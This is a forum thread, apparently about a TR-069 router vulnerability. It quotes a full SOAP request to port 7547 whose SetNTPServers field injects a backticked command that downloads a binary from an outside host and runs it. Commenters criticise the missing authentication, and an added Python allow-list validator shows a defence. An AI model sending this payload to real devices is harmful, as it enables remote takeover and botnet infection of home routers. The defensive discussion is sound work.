
POST /UD/act?1 HTTP/1.1
Host: 127.0.0.1:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 526

<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://l.ocal.host/2;chmod 777 2;./2`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>

#./2 .... busybox iptables -A INPUT -p tcp --destination-port 7547 -j DROP ...

next version step Mirai?

https://www.virustotal.com/en/file/ff6e949c7d1cd82ffc4a1b27e...




What a joke. There needs to be criminal liability for this. No authentication, authorization, identification? Data passed straight to exec() and fucking backticks are executed?
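Added example (not part of the thread and not any vendor's code): an allow-list check of the kind the comment above says was missing, applied to the `NewNTPServer1` to `NewNTPServer5` fields of a `SetNTPServers` body before any value is used. The function names and the sample request are constructed for illustration.

```python
import ipaddress
import re
import xml.etree.ElementTree as ET

# One RFC 1123 hostname label: letters, digits, hyphens, no leading/trailing hyphen.
_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")
_FIELD = re.compile(r"NewNTPServer[1-5]")


def is_valid_ntp_server(value):
    """Accept only an empty slot, an IP literal or a plain hostname."""
    if value == "":
        return True
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    if len(value) > 253:
        return False
    # Backticks, ';', '$', spaces and quotes can never match a label.
    return all(_LABEL.fullmatch(label) for label in value.split("."))


def check_set_ntp_servers(soap_body):
    """Return {field: value} for every NewNTPServerN that fails validation."""
    if "<!DOCTYPE" in soap_body or "<!ENTITY" in soap_body:
        raise ValueError("DTDs are not expected in a SOAP request")
    rejected = {}
    for elem in ET.fromstring(soap_body).iter():
        tag = elem.tag.rsplit("}", 1)[-1]  # drop any namespace prefix
        if _FIELD.fullmatch(tag):
            value = (elem.text or "").strip()
            if not is_valid_ntp_server(value):
                rejected[tag] = value
    return rejected


# Constructed sample request; the backticked value is a harmless placeholder.
SAMPLE = (
    '<?xml version="1.0"?>'
    '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">'
    '<SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">'
    "<NewNTPServer1>`example-command`</NewNTPServer1>"
    "<NewNTPServer2>ntp.example.net</NewNTPServer2>"
    "<NewNTPServer3></NewNTPServer3>"
    "</u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>"
)

if __name__ == "__main__":
    print(check_set_ntp_servers(SAMPLE))
```

Validation of this kind complements, rather than replaces, passing the accepted value to the NTP client as a separate argument instead of through a shell string, and requiring authentication on the service.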


What is this? A TR 069 exploit?!



Thanks.

Jeez, I hate Telekom routers. They're unstable pieces of crap (except the rare, rebranded AVM Fritzbox models). Back when I was doing freelance home IT support, these dungheap devices caused most of the problems.


It looks like one.



